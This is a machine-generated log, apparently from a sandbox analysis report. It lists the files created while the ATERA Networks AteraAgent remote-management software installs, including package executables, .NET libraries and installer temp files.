                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSystemTools.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2D79.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4d.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBAB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9409.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5885.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI41D1.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5085.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI432A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
